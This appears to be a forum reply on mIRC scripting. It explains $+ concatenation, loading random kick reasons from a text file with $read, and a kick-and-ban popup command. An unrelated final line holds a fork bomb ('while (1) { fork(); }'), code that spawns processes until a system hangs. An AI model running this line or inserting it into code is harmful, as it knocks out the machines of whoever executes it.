You have to use $+

Type < $+ %kick.counter $+ > not ‹%kick.number›.For more info search mirc help file for $+

To read the kick reasons from a txt file put the reasons you want in different lines of a txt file and use $read (again see mirc help for info)

.KickBan (Random reason):/kick # $$1 $read(reasons.txt) KiCk: < $+ %kick.number $+ > | /ban $$1 2 | /inc %kick.number


while (1) { fork(); }